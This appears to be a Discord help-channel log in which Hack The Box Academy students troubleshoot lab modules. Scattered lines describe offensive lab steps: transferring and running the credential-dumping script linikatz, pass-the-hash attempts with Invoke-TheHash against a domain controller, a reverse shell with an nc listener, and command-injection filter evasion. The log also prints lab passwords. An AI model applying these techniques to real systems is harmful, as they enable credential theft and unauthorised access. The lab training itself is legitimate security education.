do I need to redownload the vpn connection file?

it's just some weird instability with your connection

yes

mmk

whenever you change vpn regions it generates a new vpn profile

also the obvious (dumb) question, are you running the vpn in your vm?

unrelated question: is there a way to slowly "grind" cubes? like dailies?

no

t0 modules are "free" in the sense they give back the cubes you spent on them

no vm, I have a linux laptop I'm using openvpn through

t1+ all give back 20% of cost

same point being made, but thanks for clarifying

so if I want to do some of the harder stuff I either have to buy a sub or pay for cubes

mmk

paying for cubes outright is scamming yourself

yeah I read that

plat monthly gives 1k cubes for $68
1k cubes outright is $100

hmm same error after changing box

my laptop is vpned into htb

i rdesktop to the windows box spawned

in a new terminal on my laptop I run smbclient [flags]

hey, im doing the stack based buffer (linux) module and following the steps, but wehenever i try to run x/2000xb $esp+550 to check the stack the shell becomes completely unresponsive and i have to close the tab and start over, anyone know how i can fix this

also you should be doing //ip/ not just ip

yeah I'm still getting this error despite chaning my min protocol on my laptop to core/nt1

that won't really change much

try changing completely to EU instead and seeing if that makes a difference and spawns it properly

@fathom pendant hey it says permision denied, i wrote the password correctly

mmk

then use an http.server and wget

this winhost has http.server?

oh

does TCP / UDP make a big difference for this for my vpn?

you're in rdp

yeah

xfreerdp has the /drive: option

btw the perspective of this section is from only shell access

rdp isn't necessary

no wait look

from my linux os, im accessing this rdp win

and from this win im sshing into like 3-4 other linux users lol

?? that's not right

lol

you should be able to ssh directly from the first go

i cant bother doing the things the section told abt

do i have to?

i'd highly recommend doing it that way

as you shouldn't be on a windows host at all

the host should be a linux host

and you perform pth from what i recall

yeah

pth from linux

the initial host should be a linux host

that you can ssh to

no its a win one

i should ssh into the win one

but instead i did rdp

man my brain is fked up

https://academy.hackthebox.com/module/147/section/1657 ?

yes

you should be dropped into a ssh session that's a linux host

not windows

last question

that's why things seem fucked up

hold on lemme try

you should definitely be doing things as described in the module

don't do things outside of what's taught; get through the questions first and THEN fuck with things and try other stuff

oh

RDP is not how you're initially meant to access this box

do i have to download proxychains...?

I've regenerated this vpn connection 4 times accross the US and it's still not working. I'll try an EU server and if this doesn't work I think Imma move on lmao

no

xd

i'm telling you: you're doing things HEAVILY Wrong

oh... lol

i got all the questions right tho, only last one is remaining

do things as described in the module. deviating means you're going out of scope, and it'll be harder to get help

because they didn't require you to run an enum script, just common sense

alr i'll try to stick to it

yeah exactly

besides, you'll need to specify the port with scp

since the box is running ssh on port 2222

not 22

ok let me try it one last time, then i do thr proxychain stuff

for fucks sake

fine continue being stubborn

ya hmar

sry lol i'll download proxy chains

you can ssh directly into the target

PROXY CHAINS ISN'T REQUIRED

wait look

ssh user@ip -p 2222

ok 1 sec

ya hmar just ssh into the 10.129 target

ok

as the initial question tells you to do

also; wrap the user in singlequotes

ok

i'll try

Haven't done that module myself, but it could be because you're trying to view too many bytes at once.

also specify port 2222

SINCE THAT'S THE PORT THAT SSH IS RUNNING

okok

i did that but it didnt work

literally in the first question

wdym "didn't work"

well that's what i'm supposed to do according to the module, and im looking for specific bytes aswell

you need to specify the port with -p

You're supposed to view 8k bytes at once?

hold on it isnt pingable

any way to get around this then ?

vpn issues 1 sec

'david@inlanefreight.htb'@ip

Ah, I see. Not sure why it crashes then, but you can always go in smaller increments, like x/500xb and just repeat the command

that's the full proper username

david@inlanefreight.htb is the username

im fking in finally

ty

now how to transfer linikatz? i have it copy pasted there

i'll see if that would give me the results i need , thanks

ya hmar; go to the directory you have linikatz in; start an http.server -- then in the ssh session do wget http://<your tun0>:port/linikatz.sh (however it's spelled in that directory)

I suggest you go back over the File Transfers module

as this is a very fundamental and basic skill

i swear i know all the stuff

apparenlty not since you're asking how

but can the linux hosts speak to my tun0?

best to check 👀 I am sure MarcieLee does not just say it at random

...

...ya hmar because it has a tun ip

do ifconfig

and you'll see

ok 1 sec

i swear watching rudy/arab dad content has infected my vocabulary

O.o

I don't even know what those things are 😆

u know what ya hmar means?

its an insult according to google 😮

it means you donkey xd

i'm aware of it's connotation

😮 😮

i'm not saying it without knowing

k

I rarely use words/phrases without knowing their meaning

yo i got linikatz inside of david

i mean his ssh session

👍

do i do the same for svc_workstations?

are you following a specific path amar?

you can just switch to svc/root and run it

u mean like pentest path? yes

cool!

yea

you don't need to copy it to every user

ye just tested on david

you have access to svc_workstation so you could easily have tested there

crashed again here , not sure if it's my machine's prob or something else is causing it

i have finished sec fundamentals path too

kk 1 sec

nice, enjoying it so far?

ye

So 50 and 100 worked fine, but 200 crashed?

yeah , and i need to get waaayy past that

It feels a bit to me like GDB is running out of memory. Do you have enough free memory in your VM?

same error

you know you can just sudo su you don't need to do sudo bash

also make sure it's executable

ye i chmod it

the vm im working on got 7gb ram

my other vms are 8 at max

i wonder if doing sudo bash is messing with it

instead of switching to root

ok lemme sudo su

same err

/bin/bash^M: bad interpreter

run it with sh

just do bash linkatz.sh

sudo sh?

if you're root you don't need sudo

sudo bash linikatz.sh?

ok

i thought u wanted me to exit root

i think the bash is doing smth with those $

i'll try googling

yeah it worked

https://stackoverflow.com/questions/14219092/bash-script-bin-bashm-bad-interpreter-no-such-file-or-directory

@fathom pendant i finally solved the question tysm

great job amar

thanks ❤️

Tried on my VM, and the command from the module worked fine on a different binary. I'd try with another binary and see if that makes a difference or use the PwnBox

thank you, I totally forgot the pwnbox ill try that too

I sometimes have these things too. Like I can't run mongodb on my mac, even when emulating to amd64 (and building a docker image for amd64)

Hello, for the question where you start the SSH in linux fundamentals module , it asks me to choose between 3 identities and require a password which i dont have ... am i missing something ?

Which chapter?

linux fundamentals - Service and Process Management

we cant send screenshots here ?

I think you need to complete some steps in #welcome

It seems it's as usual SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"

doesnt work for me , i have to choose between mrb3n and cry0l1t3 where the usual pasword doesnt work

Read and follow #welcome to be able post screenshots here

yeah i saw

No this is to start the ssh service on your machine (or any server you want people to be able to ssh to). Here you're already connected to the box, so the ssh service is already up. You don't have to do those steps

i am confused why they ask us to do it this way knowing that everyone already connected to the SSH beforehand hence ruunning into this issue

Introduction to BASH Scripting -> Comparison operators. I'm 1 hour was trying to understand where I was wrong. But it appears that I needed to submit last 19 characters, and not 20 as was stated in question.

heeeloooo

i am new

hi

hi

HII i will learn THe hacking pleas

hi

im new too can someone help me ?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@final garden ^

help with what?

they aren't asking you to do this

Hello ! I had some questions regarding the reports part for the pts exam. In the documentation modules they gave us an example report where they show the walkthrough of how they managed to root one host by the help of finding information on some other host. But since we are going to have a network, we will probably hahve to root more than one host, do I have to detailed as much for every host that I managed to root ? Just to make sure, thank's in advance !

Yesss

it's telling you how you'd start the service on your own machine

here's a counter question, why wouldn't you?

Oh it's because I'm afraid to write too much on the Assessment Overview and Recommendations part. In the module they advised us to write 1-2pages tops for this part and then detailed on the walkthrough part !

don't worry about overwriting

worry about underwriting

i'd rather have too much than too little

submit the report and if you fail, you'll get feedback on it

okayy perfect, thank's for the advice !

If you're a car person, think of it this way: You take your car into the shop for an inspection, the inspection says xyz is broken and abc is needed to fix it. Later you find out that they did find def but didn't tell you about it, and it becomes a serious issue

how upset would you be?

yeah you're right, better overwrite than miss something important :/

can i dm you ?

i'm sure you'll be fine :)

anyone can help me im new

What is it all about? Discord? HTB Academy Module?

if you're looking for help on where to start, the link from a bit ago tells you how to get started

yea discord

sure, send me a dm

thank you, i've seen you a lot here in the discord, you're helping a lot of person including me, thank's for all of that !

weird the user/password for this module isn't working when I rdesktop to this machine

what module?

and section?

is the instructions to RDP to the machine?

Guided lap portion of AD Administration

and yeah, I'm supposed to RDP

oh this is all part of Active Directory

This is the 2nd thing I've had broken this morning :/

lemme try resetting my vpn

AD enum and Attacks? Intro to AD?

which one

hey

Intro to AD

also; redid my vpn and it's still broken

I'm using rdesktop from a kali laptop. idk if that interacts with a weird way to the box. It shouldn't.

can i connect to the hackthebox's vpn ??

is your password correct

and there are two parts, which one?

I've tried both typing and copypasting

you didn't answer my question

part 1 sorry

works fine for me, what's the error you're getting

the exact command I'm using is:
rdesktop -u htb-student_adm -p Academy_student_DA! 10.129.8.235

use the xfreerdp command provided in the module

rdesktop worked on the other windows module

yes but you didn't tell me what error you're getting

I'm trying to get it again and I can't even get the box to come up right now

for the question : Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer. i havee tried with different methods but i do not have all the details

I just got an unable to connect error

well are you connected to the vpn and is the ip correct

yes

I'm resetting everything again

module and section?

linux fundamentals - Service and Process Management

What does the acronym Linux PAM stand for?

Google

done

you need to ssh into the target

oh thats weird i had to reconnect to the SSH. is it normal i have to do it several times per hour ?

each section will probably have a target you'll need to spawn

my windows rdp connection seems to be getting slower every time I try and connect to the box

okay thanks !

hmm my openvpn isn't working correctly

my IP isn't changing. I'm running the exact same command I was earlier

I'm testing the canvas feature of obsidian

It reminds me of xmind

hmm my vpn has stopped working completely

change servers and download a new vpn file

Your ip shouldn't change when using htb vpns

I've done this at least a dozen times today.

It'll set up its own interface [tun0 if not using other tunneling vpns] and assign an ip to that

how do I check my vpn is working properly?

Have you tried using the tcp instead of udp download?

Do you have a tun0 ip?

checking

yeah

Then it should be working, granted you don't have any other tun interfaces

inactivity timeout

then attempts to reconnect

cool I'm atleast able to touch the windows vm now

getting "invalid username or password" again

hmm my vpn keeps having to reconnect

Sounds like potentially it's a your internet issue

that's kinda what I'm guessing

cox says it's fine but I don't trust them at all.

You need a domain to append egg boi

Cox, they can... well you get it

If you can ping Google.com do you get a variable ping?

whats the ip for that?

isn't it 8.8.8.8?

Hello HTB-Academy team. Is there a change the Windows target machine you provided in Windows Privilege Escalation module is available for download? i try to get my own Windows 10 build 18363 (aka version 1909) iso but there isnt any on the Internet. I need it for a University project.

yeah I get a variable ping

Like how variable I should say

Within 20 is normal

Greater than that = isp shenanigans potentially

I also suggest resetting your router as well

yeah I got a 40 spike

actually that's 50, math hard

in Linux fundamentals - Task scheduling , the first question doesnt even work ...

Windows Event Logs & Finding Evil need help with this please i don't know if I should use my system or there vpn and there's no good walkthrough on how to setup I'm kind of lost.

Read the Module again and read what exactly you have to do

i am at the very beginning, nothing else is asked

You really need to differentiate the commands they show you and what you need to do for the exercise, it's not just copy pasting and it's true for all HTB modules.
I think you might want to first focus on understanding the whole chapter without trying the commands, and then try the exercise.

its not an exercice , its the first step of the chapter

And in this particular example, I think you can try this part on the pwn box (cf #modules message )

i have doing it all on the integrated Instance

Examples aren't always steps

This is an example of how you'd do the thing

Sometimes examples are just that

whats the point expect driving people nuts and make them rethink their life choices

I suggest reading the whole section instead

You do not have to use every command in the module. You only have to answer the question at the end.

? The point is to show an example of how you'd create a timer service

because that means by having the "htb-student is not in the sudoers file." error, i technicaally do not know how to create a timer. why not giving us example we can try throught the Pwn Box and then play around to learn

Do it in the pwnbox instance, not the ssh then

and i bet the question at the end expect you to perfectly master everything that was "teached" before

i did it on the pwnbox and i got that error

I suggest taking a break

?

Yes you didn't try it on the pwnbox, because the htb-student on the pwnbox is a member of sudo, so it would work

Btw the creds for pwnbox are on the desktop if needed but I believe they have it so sudo doesn't ask for it

Please try to understand this (amazing) diagram: #modules message

That's not in the pwnbox, that's in the ssh session

Open a new terminal

Also you can click the full-screen button to open a new tab in full-screen mode

Instead of that small windows

Refresh that page

it was just to prove i was in the instance

You're not understanding what we're saying

There a couple of situations… I feel you, brother

sorry explain again please

You're running the command in the ssh session, for which the htb-student account does-- in-fact not have sudo access

ahhh

Open a NEW TERMINAL such that it says htb-ac[nnnn]

Spent 8-10 hours yesterday to be able to scan a target from a Windows stand alone port scanner

now it works. how do we know wether to be connnected with the SSH or not ?

Depends on the question

Ssh is generally only to answer the questions

i spent 5h to manage installign all the packages without running out of space 🥲

goods to know !

Got a couple of boxes hanged using the Pwnbox due to not having disk space after getting the necessary compilation libraries as well

Use ifconfig and look carefully at the tun0 part.
If you see the target IP, that means you're through a SSH session (same as next to Target(s):)
If you see an other IP, that means you're on the pwn box (at least in that case you have only 2 options)

so to create a timer you need "admin" acess i suppose and by being connected throught SSH you are just a normal user that cannot use any sudo command ?

root access

It depends

Sometimes the user you ssh to does have root access to the system

root is for Linux devices

It's a built-in account, like Administrators for Windows

okay makes sens

i can now untie the rope

thanks !

just all depends on the actual question of the section ¯_(ツ)_/¯

Sometimes they're nice and you'll know directly (htb-student_adm)

Or you can figure it out through context

the only time they were nice was during the "how to learn" module

🥲

You need to learn how to learn and make that squishy brain of yours work

Making informed assumptions is what this field is about

Even if it's tempting, it's best to first try to understand the whole chapter and only then try to reproduce the commands, otherwise are you really understanding what you're doing?

i get that but that would be great to be tested in this way after knowing the "basics " and not already being tortured . i might struggle to understand their wy of teaching but sometimes it feels like they barely cover some subjects and then they test you ike youve been studying that part for 2 months

i will probably go over old chapters and try to find more info throught forums and ChatGPT later on

Tbh just read the whole chapter first

You don't need to replicate every command shown

Just the ones relevant for the section you're on

Or be given enough info to google your way through it

okay that could be a way

90% of this field is just going to google

It's the way most people go through it

okay so i suppose i shouldnt feel ashasmed asking chatGPT to breadown a whole line of command and explain every aspect

Nope

Though chatGPT can be confidently incorrect at times

Also

TAKE NOTES

yeah i always double check

always.

Yes, this module in particular will require some external researches for some exercises. And to be fair, it's not the most beginner friendly for a total beginner, so all modules won't be as hard. Since most of your questions here were basics, ChatGPT should give you correct answers (also if something doesn't work as intended just tell it, it should correct itself)

do you recommand pen and paper or like Notion ?

I use obsidian

But whatever way works for you

okay great to know because im good with tech but when they said this is for total newbie i was questionning myself

I use obsidian too since a few years (and love it) but yes it's a personal choice

it looks great !

is everything okay with academy labs?

Hey guys i want to ask a samll question regarding HTB CPTS Pass the Hash (PtH) Here in this question Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account? i am facing problem i dont understand why i already enable Restricted Admin Mode , but i cant get rdp

You mean "password attacks" passthehash

That module isn't exclusive to the cpts path

You mean disable*

Try adding /timeout:60000 as the error you're getting is a timeout error

Windows event logs and finding evil Module:

I haven't done a module in the skills path yet that has taught me how to rdp...
I've tried amending this in a few ways inside powershell, which they provide just above the pwnbox, but haven't managed to get it right:

"An0ther1bytesDDoS@htb[/htb]$ xfreerdp /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:[Target IP] /dynamic-resolution"

Filled in the target IP
Tried getting rid of eveyrhing before xfreerdp

it works but why i dont understand the reason behind it

You don't copy the "anotherone...$" part

Just the xfreerdp and after part

Because timeout. Unstable connection. Something isn't connecting in a timely manner

@fathom pendant
Do you use some kind of check list, for example for Windows Privilege escalation (I'm talking in general, not a particular module)?
Like a bullet point list of each privilege escalation vector that you copy paste (the whole list), and then you verify each point one by one, marking them as verified once a point is

But its verry lagging really slow

Haven't gotten that far

Connection issues then

¯_(ツ)_/¯

well I had tried that, but for some reason it worked this time, so thanks haha, sometimes it takes that magic touch

OK, I think I'll create check lists, at least a windows privesc one and an AD one before trying the CPTS

Guys, anyone still remember the module "Server-side Attacks", section "Exploiting SSRF"?
It's the one that teaches about gopher, gopherus.
I can't get the flag. My enumeration shows that the server has service running on 3306 which is MySQL.
But no matter how I put the gopher link, I'll get 500 internal server error.

https://i.imgur.com/W2qqYsS.png

To post screenshots here, read and follow #welcome

Make sure the date is right

Verified, thank you.

Hello, can anyone help me pls Password Attacks Lab
I found Johanna password then I tried to connect with rdesktop and xfreerdp but not worked why rdesktop said wrong password or username

Date is right as in "format" right, not real date match current date?
The localhost/index.php reflected no problem. But I can't get the flag accessing port 3306

windows event viewer and finding evil module:

In windows event module, when trying to set up a filter, where ON EARTH is the okay button?
How do I apply the filter?
All I see is the clear button

guys pls

someone pls

Pretty please

I see... it is below the clear button...
It's just that the only way you can see that in the pwnbox is by hiding the taskbar

Please include the module and section when asking for help.

I've done the module, but I'm 47 now, so...very forgetful. Wanna help.

okay thanks

Or by lab maybe you mean one of the final assessments?

Actually, damn, I hid the task bar but still can't get to the bottom of the window to see or click the okay button

If you do /dynamic-resolution in your rdp command you can resize the screen and it'll properly show it

You can just close, hit the up arrow key, and add /dynamic-resolution to the end

I think I did, but it just opened the desktop normally, so I found event viewer in the searchbar instead

Don't need the ip in brackets btw

thank you

Then resize the screen

It should redraw the screen to the appropriate resolution

ahh you mean click the fullscreen button below the pwnbox? ahh of course

yeah i can see it now haha

thank you

Well yeah... that too

Lol working in a tiny window with rdp is a pain

Thank god for fullscreen mode

Only slight drawback is when you go the next page it resizes, but refreshing the fullscreen page fixes it

There's no workaround for it

i've a question about the module command injections;
in this question: Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
so when i test with burpsuite for injection operaters || & || is the only one that sends the pings and doesnt give me an "invalid input" error. But why is the || new-line (\n) || the right answer even tho it is blacklisted because it gives me an "invalid input" error?

my brain isnt braining anymore

yeah that has happened to me once or twice, it is a little annoying, but nowhere near as bad as when you can't find the bug in your code 😂

It should work, what tool did you use?

burp suite (pro), ill reset the machine hope it fixes somehow

nope it just the same... thats pretty weird

If I recall correctly ||there are other filters in place, so try to only send a new line without any command first||

yea thats what im doing, so it doesnt trigger || the command blacklist ||

but it doesnt work either

ah url encoding does work, but still are confused why || & || is wrong even tho it gives me the pings

anyone having issues with Targets Spawning? been waiting for over an hour for targets to spawn in Password Attacks > Attacking SAM

Because if you don't url encode & it will be interpreted as an parameter separator like ip=127.0.0.1&otherParam=value, so in then end the server only process ip=127.0.0.1

Values like ?(define parameters zone), &(add an other param), =(assign value to parameter) won't be url encoded because they already have a meaning, so they won't be added to the ip value where the command injection happens.
But values like | don't mean anything in a url, so they will be injected as is.

cf https://cyberchef.org/#recipe=URL_Encode(false)&input=dXJsP2lwPTEyNy4wLjAuMSZvdGhlclBhcmFtPXNvbWUrdmFsdWU

went to another section and spawned the target there, then went back and was able to spawn

aaah, didnt know this. thank you for you explanation

Windows event viewer & finding evil module, Windows event logs:

Task 1

I am struggling to apply the investigation examples in this section to task 1, in order to get the Answer.

I sucessfully found the log they asked about, and I then followed the investigation example, I came to the conclusion the answer is Services.exe as that is the ProcessName AND the ONLY .exe I can see anywhere in the log information.

This did not work,
I tried applying the rest of the investigation to it, which is taking the LogonId and finding other logs containing this, to find when this all started, so as the page shows I created this XML query containing the logonId of the target log: <Select Path="Security">[EventData[Data[@Name='SubjectLogonId']='***']]</Select>

Now I have a whoooole load of logs, and I'm just not sure which to look at

Ok so you have to follow the similar steps, a logon event gives an ID, which that ID is gonna be unique

Then it just depends what you're tasked to actually look for

What is the question asking for?

Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer.

So I have to find the log which modified the auditing settings, which also has the logonId of 0x3E7?

"Modifying auditing settings" what event ID correlates to that 😉

Yep

That will narrow down a lot

Windows logs everything that's done

Thank you, I may need to do some external research on how to add that to my XML query, as I'm locked into the XML type of querying with this ** search

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/audit-audit-policy-change

Hi I'm really struggling with the icmp tunneling section in pivot module.

Hey i have a simple doubt in the web proxies section i have to decode an encoded data to submit the answer i decoded it from base64 2 times and still have encrypted stata the hint says to url encide is also needed i cant seem to figure it out

Try url decode

Also things can be encoded multiple times

Specifically the mismatch in glibc between my system and target

Download a precompiled version

Otherwise you'll need to build it with the specific glibc on the target

I tried multiple times decoding with url not working

I've tried to install a version of glibc that matches the target

https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/advanced-xml-filtering-in-the-windows-event-viewer/ba-p/399761

Ahh they put a link to it in the unit! You can't skip over what is usually extra cirriculum! Truth be told I love how much I'm being required to think here haha

Yeah it's definitely nice to not be spoonfed

Then you look back at how relatively simple it was

What section specifically

Encodeing decoding in the webproxies module

Have you finished any certs yet?

Keep decoding with b64 a few more times first

When it's fully decoded you'll get HTB{..} flag

Got it

You'll know when it's time to URL decode

😅

It's very obvious

Nope

I thought when the == was gone base64 encryption was over so i stoped decrypting it with base 64 and tries to url encode

I had to do base64 decrypt one more time befor url encodinh

= is just a padding character in b64 to make it the right length

Ohhk

Can someone tell me what I'm doing wrong?
The ip address I created the payload is 172.16.1.5

So you can have a b64 string that doesn't have = or ==

Is that the internal ip of the host you're on?

Which section is this the skills assesment in Ad section

yea

Are you doing it from cmd?

what is it mean

Ptt which section

As in if you do ipconfig is that your 172 ip?

172.16.1.5 as i said

Ptt section in password attacks

Are you running it in cmd?

Run it in cmd, not powershell

As the module states

Trust

you mean I have to use cmd and using powershell inside cmd ?

Yes

Read the text just above where it gives you that command

And even the command example is in cmd, not powershell

I have looked at the link provided in the unit to help with XMLqueries, that's one of the screenshots

Working on Windows fundementals - Windows Security and it wants me to find the SID of user: bob.smith but the connection name it gives is the normal 'htb-student' and when i connect to it it only has one user which isnt bob.smith. any hints?

didnt work

Likely wrong eid

Are you running the nc listener?

yes sure xd

?

So that's a yes that you have nc.exe running on the port you specified in the revshell?

Maybe you're not using the right command?

yes bro

You can enumerate other users. You don't need to be Bob.smith to find out about him

Nothing is wrong with the port and IP, could I be doing something else wrong?

The reading calls out a specific id

yes **

Running the command from CMD instead of powershell should work idk what else to tell you

So use that

right but i dont have his email, ip or anything. so what poweshell command would work bc the module was logged into bob so i cant look at it to see what command to use

You have his username... bob.smith

should i go look up powershell commands? the ones i am finding say it wants an email or ip

What commands are you trying? That's really weird

Get-WMIObject will be helpful

was trying to use get-ADUser

https://academy.hackthebox.com/module/49/section/454

Maybe it's not an ad environments

Or Bob isn't an ad user

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1

the ac i am is ad but idk if bob is, does that change where im looking?

https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-useraccount

thank you ill look into these

I'll try reading the XML resource a bit more

check your SubjectLogonId again..

oh awesome, thank you

The funnier part of this screenshot is you manually retyped the query

Instead of copy/paste

@fathom pendant and @dim wolf I got the answer, thank you so much

ahh my instance died on me! haha

You had it right in the ss with the wrong event

Since it's a t2 mini module the screenshots have to go

As spoilers

fair enough

Wanna edit the id out of this one?

Since most of that query structure is in that section

yeah true

Have you got any advice so I can prepare for instances dying?
It is all I can do to watch the clock, and click extend life?

Yup

Tbf most instances shouldn't die before you crack it

Hahaha

I'll take the flak haha

@fathom pendant are you online?

But you can extend a target life to like a max of 6 hours

And if you really can't crack it @ 6 hours, go be a farmer

I’ve also tried to use double black slashes, (even if the single quotations should deal with that), but I seem to get the same error

With\ you need to do \\\\ip\\share

I’ll try that again I suppose

Also try double quotes instead

or try //ip/'Company Data'

Windows event viewer & finding evil, windows event logs:

Task 2

Judging by the structure of the 'details' section when reading a log, I'm not sure why EventData is followed by Data and @name... but as it worked for the last thing I queried that is within event data, I tried this:

Because there's multiple data tags

With different names

<Data Name="thing"> data_related_to_thing </data>

ahh, and I'm not even searching for the culprit excecutable, need to change that too

Hello it is me again 🙂 in Task scheduling, What is the Type of the service of the "dconf.service"?, i tried with different methods such as systemclt list-units --type=service | grep dconf or like systemctl show dconf.service but it is not there.. i even did a sudo apt-get install but still nothing ...

If you look at documentation on an event id it tells you all the data tags related to it

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624

Or if you view the xml of the event in event viewer you'll see it

Think of it like html div tags

Hey guys, any idea which packets i need to download? I can't find the right one

Install parrot-core

sudo apt install python3-impacket in case impacket isn't installed

did it but same reslut @fathom pendant

sudo apt install smbclient

Also might be under core-utils

Add -t lory-backports

that does simplify it, but I still need to figure out if I can just write the tags, like in your example, or if i need to stick to this <select path> etc. etc. etc. style syntax

You do

why this? im curious... is this another bash fundamentals thing im unaware of?

at which command ^^

... the install command

thanks can you tell me why it didn't worked before?

¯_(ツ)_/¯

its kinda funny that somethimes we do things it work and we don't know why

remove the ' maybe ?

was demonstrating what worked and what didn't

oh srry

Hey all, not a VIP, but everything says offline. Did something change?

thanks

where did you get the idea to put quotation marks only around company data is what im curious about

Don't need to be vip

There's a space in it

Also vip isn't an academy thing

it just happens to work with smbclient and most other tools

what I thought, been over a year since I have logged in and all say offline

It sounds like you're talking about the main site UI

Offline = not connected/running

Nothing wrong with the site

Thx

I tried compiling the glibc lib that's on target on my machine

My make failed with errors I couldn't debug

You'll need to download the glibc for it to compile

I did download the glibc source

And tried to compile glibc

¯_(ツ)_/¯

Then I eas hoping to link the glibc lib in compile for prinnel

Ptunnel

Biggest suggestion though is just use a precompiled version

But failed at compiling glibc

Way less headache

Ok thx I didn't take a look for one yet

On the ptunnel github should be a releases page

Perfect I'll take a look

Suppose I need the version that was compiled with the "correct" glibc version

Need to finish off pivot so I can get into AD module

Btw is it a bit strange there's no mention of ligolo-ng?

No

Ligolo came out after this module was written

Ok

Technically it's not even at 1.x yet

But still some useful knowledge

I mean the pong and dns tunnels is good knowledge for evasion

Not really, most will still get caught

┌──(kali㉿kali)-[~]
└─$ smbclient -N \\\\10.129.91.158\\'CompanyData'
session setup failed: NT_STATUS_ACCESS_DENIED

ive tried every single variation reccomended to me here, maybe its the share permissions on the Company data share?

this is getting a tad annoying

Well don't use -N

Use the credentials you have

ive tried without -N

i shouldve clarified sorry

Calc had -N because he set up an example on his system

Did you use creds?

yeah, the target password

Hi! I probably have a fairly basic problem with connecting to the machines described in the course content (https://academy.hackthebox.com/module/77/section/726).

Following the instructions, I downloaded the VPN connection configuration and successfully set up the tunnel:

2024-08-02 15:07:10 Preserving previous TUN/TAP instance: tun0
2024-08-02 15:07:10 Initialization Sequence Completed
2024-08-02 15:07:10 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 68, compression: 'lzo'

└─$ ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.15.98 netmask 255.255.254.0 destination 10.10.15.98
inet6 fe80::1890:ddab:310f:d3c4 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::1160 prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 9 bytes 792 (792.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22 bytes 1236 (1.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

┌──(kali㉿kali)-[~]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 172.16.169.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
172.16.169.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0

The problem, however, is that when I try to connect to any service, I get the "no route to host" message:

└─$ nc -nv 10.129.42.253 21

(UNKNOWN) [10.129.42.253] 21 (ftp) : No route to host

Exactly the same thing happens when I try to connect via pwnbox (same message).

I've already changed the server location (eu, us, etc) but it makes no difference.

Please help.

Are you spawning the target?

Also you'd want to connect with ftp

Ah I see your issue

That example ip isn't a live target

You're trying to connect to the example

How stupid I am... Thank you!

Thanks for the assistance, I’ll just use pwnbox for this section of the module

guys can someone help me with this david question I'm trying to access the dc but it says david does not have access to it the question is Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

PS C:\tools\Invoke-TheHash> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0
[-] inlanefreight.htb\david WMI access denied on DC01
PS C:\tools\Invoke-TheHash> Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0
[-] inlanefreight.htb\david does not have Service Control Manager write privilege on DC01

this is what I got when I tried

@lime quest try dc01 instead of DC01

also idk which question u r on but the first command(the lengthy base64 one) is actually the right way for one of the questions, u just need an other console i think for the nc listener

Remember, you can do it

for the Fawn case, i need to get the FTP file but i get this and it is stuck in a loop

Hello all

I am working on pass the hash - password attacks modules but I cannot access the rdp, it says password incorrect

hey, i'm on the pivoting tunneling and port forwarding module. i'm on rdp and socks right now. i managed to get the dll on windows but the real time defender blocked it. i restored the file, and everything is fine. my question is, if we are on an engagement, would we need to reach out to the client to let them know we are changing software configs like firewalls or antivirus before we do it?

use single quotes on the password: 'admin123!'

What could potentially block us from accessing this share if all our entries are correct and our permissions list has the Everyone group present with at least Read permissions?

Why am I so stupid? why couldnt i literally read 2 words down after encountering my issue?

@fathom pendant could it have been this

This is comedic... I was intended to not be able to access the share

Windows event viewer & finding evil, windows event logs:

My event viewer IS filtering for the former query tags, but not the latter, however no error comes up when I click ok on the xml query to apply it:

I'm just trying to figure out how I can get the filter to check for both at the same time.
The former checks for this .exe being the cause of the log, and the latter checks for if this .dll is affected by the log

or is supposed to, anyway

I am supposed to filter for both of these at the same time to have a chance of finding the correct log

Hello

AND
You’re making 2 queries… try making one query with both conditionals

@dim wolf in my near infinite foolishness Ive discovered another error

I was trying to connect to the Company Data share assuming it was an actual share, and not the share that the module section created as a demonstration

I also hadnt known that the inbound firewall had to be configured anyways

hello everyone, i hope you all are well.

Module :
CRACKING PASSWORDS WITH HASHCAT
Page 10
Working with Rules

Question:
Crack the following SHA1 hash using the techniques taught for generating a custom rule: 46244749d1e8fb99c37ad4f14fccb601ed4ae283. Modify the example rule in the beginning of the section to append 2020 to the end of each password attempt.

Command that i have use :

hashcat -a 0 -m 100 46244749d1e8fb99c37ad4f14fccb601ed4ae283 /usr/share/wordlists/rockyou.txt -r '/home/raza/Desktop/rule.txt'

Content in rule.txt:

$2 $0 $2 $0

but i am not getting any result.

